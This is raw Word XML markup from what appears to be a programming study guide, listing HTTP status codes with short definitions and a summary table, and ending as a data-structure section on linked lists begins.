          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The request has been fulfilled, and a new resource has been created (usually used with POST).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5608E9D8"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2 Accepted</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The request has been accepted for processing, but the processing has not been completed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EFFDF55"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4 No Content</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The server has successfully processed the request, but there is no content to return (used for DELETE or PUT requests).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29278DE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5 Reset Content</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The server has successfully processed the request and instructs the client to reset the document view.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7ACDF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6 Partial Content</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The server is sending only a part of the resource (used for range requests).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3BBB9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3xx - Redirection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D997C3B"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0 Multiple Choices</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The request has more than one possible response. The user or user agent can choose one of them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643FC97C"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1 Moved Permanently</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The resource has been permanently moved to a new URI. Future requests should use the new URI.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E218305"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2 Found</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The resource has been temporarily moved to a new URI, and the client should use the original URI for future requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66AC4303"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3 See Other</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The response to the request can be found under a different URI using the GET method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7993AF04"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4 Not Modified</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The resource has not been modified since the last request. The client can use the cached version.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31AE1FFE"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5 Use Proxy</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The requested resource must be accessed through a proxy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000E30B7"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7 Temporary Redirect</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The resource has temporarily moved to a new URI. Future requests should use the original URI.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6F7D00"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8 Permanent Redirect</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The resource has permanently moved to a new URI, similar to 301, but the method and body are not changed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1B3C66"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4xx - Client Error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E8DC8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0 Bad Request</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The server cannot process the request due to malformed syntax.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A61588D"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1 Unauthorized</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Authentication is required and has failed or not been provided.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538ED87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2 Payment Required</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Reserved for future use, typically related to payment systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A130C6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3 Forbidden</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The server understands the request but refuses to authorize it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37CF5D4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4 Not Found</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The requested resource could not be found on the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293942EF"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5 Method Not Allowed</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The request method is not supported for the requested resource (e.g., using POST on a read-only resource).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C986C5"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lastRenderedPageBreak/>
        <w:t>406 Not Acceptable</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The requested resource is capable of generating only content that is not acceptable according to the Accept headers sent in the request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1243F309"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7 Proxy Authentication Required</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The client must authenticate with the proxy server before proceeding.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53CF4DF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8 Request Timeout</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The server timed out waiting for the request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52EF420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9 Conflict</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The request could not be completed due to a conflict with the current state of the resource.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC47742"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0 Gone</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The resource is no longer available and will not be available again.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1FF6B7"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1 Length Required</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The server refuses to accept the request without a defined Content-Length header.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3848BF38"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2 Precondition Failed</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: One or more conditions specified in the request headers were not met.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59DCA12E"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3 Payload Too Large</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The request is larger than the server is willing or able to process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002059C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4 URI Too Long</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The URI provided is too long for the server to process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="741FCDC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5 Unsupported Media Type</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The server refuses to process the request because the media type is not supported.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0326198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6 Range Not Satisfiable</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The range specified in the request cannot be satisfied by the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67ADDD7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7 Expectation Failed</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The server cannot meet the requirements of the Expect header field.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="141598B1"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8 I'm a teapot</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: An April Fools' joke defined in RFC 2324, indicating the server is a teapot and cannot brew coffee.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8F77D9"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5xx - Server Error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F5867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0 Internal Server Error</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The server encountered an unexpected condition that prevented it from fulfilling the request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B354E44"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1 Not Implemented</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The server does not support the functionality required to fulfill the request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17084CEA"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2 Bad Gateway</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The server received an invalid response from an upstream server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347B680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3 Service Unavailable</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The server is temporarily unable to handle the request (e.g., due to overload or maintenance).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5399A7"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4 Gateway Timeout</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The server did not receive a timely response from an upstream server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3AA13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5 HTTP Version Not Supported</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The server does not support the HTTP protocol version that was used in the request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6346A2A6"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6 Variant Also Negotiates</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The server has an internal configuration error where content negotiation itself failed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DAAFF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7 Insufficient Storage</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The server is unable to store the representation needed to complete the request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B9C9123"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8 Loop Detected</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The server detected an infinite loop while processing the request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1078A45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10 Not Extended</w:t>
      </w:r>
      <w:r w:rsidRPr="004C7374">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Further extensions to the request are required for the server to fulfill it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F46438C" w14:textId="77777777" w:rsidR="00092EDE" w:rsidRPr="004C7374" w:rsidRDefault="00000000" w:rsidP="004C737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DA191">
          <v:rect id="_x0000_i1988" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="459A41CD"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284"/>
        <w:gridCol w:w="4930"/>
      </w:tblGrid>
      <w:tr w:rsidR="004C7374" w:rsidRPr="004C7374" w14:paraId="3C97CF2B" w14:textId="77777777" w:rsidTr="00092EDE">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="49DB3DB3"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ode</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7ADAC8E7"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ategory</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="365A2DB2"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Meaning</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C7374" w:rsidRPr="004C7374" w14:paraId="56E74792" w14:textId="77777777" w:rsidTr="00092EDE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="26F385B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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="675E19FE"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Informational</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="201814E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quest received, processing in progress.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C7374" w:rsidRPr="004C7374" w14:paraId="41E093A1" w14:textId="77777777" w:rsidTr="00092EDE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="01B1A1D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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="169A0A2D"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uccessful</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2E8510C1"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was successful.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C7374" w:rsidRPr="004C7374" w14:paraId="1009D277" w14:textId="77777777" w:rsidTr="00092EDE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5F8C6752"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="28649AD8"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direction</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="369513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Further action required to complete request.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C7374" w:rsidRPr="004C7374" w14:paraId="15631F26" w14:textId="77777777" w:rsidTr="00092EDE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="63DBDDC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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="04D8A84A"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Client Error</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="06BCD5CF"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contains bad syntax or cannot be fulfilled.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C7374" w:rsidRPr="004C7374" w14:paraId="1D8E49E0" w14:textId="77777777" w:rsidTr="00092EDE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="16AEAA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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="45BFA0B9"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erver Error</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6385C2C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server failed to fulfill a valid request.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="76B4DA5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Each status code provides information about the outcome of the HTTP request, helping both the client and server understand the request's result and guide further actions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C8797B" w14:textId="29DB58FB" w:rsidR="00E41215" w:rsidRPr="00CE4B9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89" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E54054C" w14:textId="7903227F" w:rsidR="00E74B00" w:rsidRPr="00CE4B95" w:rsidRDefault="00E74B00" w:rsidP="004F5B43">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7C42C331" w14:textId="3A27A790" w:rsidR="006639B9" w:rsidRPr="00CE4B95" w:rsidRDefault="006639B9" w:rsidP="006639B9">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="423" w:name="_Toc197867637"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Data Structure</w:t>
      </w:r>
      <w:bookmarkEnd w:id="423"/>
    </w:p>
    <w:p w14:paraId="28471DC5" w14:textId="77777777" w:rsidR="006639B9" w:rsidRPr="00CE4B95" w:rsidRDefault="006639B9" w:rsidP="006639B9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B4DE8DB" w14:textId="25DF8EB0" w:rsidR="006639B9" w:rsidRPr="00CE4B95" w:rsidRDefault="006B6A98">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="424" w:name="_Toc197867638"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Find the middle element from the singly linked list without finding the length</w:t>
      </w:r>
      <w:r w:rsidR="006639B9" w:rsidRPr="00CE4B95">
        <w:rPr>
